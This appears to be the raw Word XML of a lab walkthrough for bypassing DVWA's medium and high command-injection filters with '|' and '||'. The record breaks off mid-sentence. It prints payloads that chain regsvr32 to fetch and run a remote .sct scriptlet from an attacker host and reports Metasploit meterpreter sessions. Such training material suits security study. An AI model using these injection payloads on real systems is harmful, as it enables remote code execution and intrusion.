    <w:p w14:paraId="1BC1ACCC" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use pipe </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>“|” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>in command injection to bypass medium security of this server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ED703" w14:textId="30F81FE6" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="764CB7F2" wp14:editId="3E3C78EE">
            <wp:extent cx="5731510" cy="3456305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15587543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456305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B842E" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow same process as above using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and further </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>type :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45EA9660" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>192.168.1.100 | regsvr32 /s /n /u /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>i:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>://192.168.1.103:8080/C99PdFH.sct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397CD85" w14:textId="4116FF50" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7839BDFD" wp14:editId="2028321B">
            <wp:extent cx="4791075" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18185922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91075" cy="1381125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B44FB2" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Again</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we got </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62141C" w14:textId="1829B82D" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A3A9582" wp14:editId="29F0DBB7">
            <wp:extent cx="5638800" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19221581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38800" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA7C12" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Bypass High Level Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45669FB9" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Click on DVWA Security and set Website Security Level </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0A463D" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Try to use pipe “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>” in command injection to bypass high security of this server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E355751" w14:textId="1439EF6B" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14868D25" wp14:editId="06F23077">
            <wp:extent cx="5731510" cy="3356610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16556290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356610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63B15E" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow same process as above using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E982F0C" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>192.168.1.100 || regsvr32 /s /n /u /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>i:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>://192.168.1.103:8080/C99PdFH.sct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51DFA3" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD48DA" w14:textId="5B8ECE7F" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E19405" wp14:editId="2F93FE48">
            <wp:extent cx="4733925" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8159719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33925" cy="1419225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0CED4" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, we have got </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
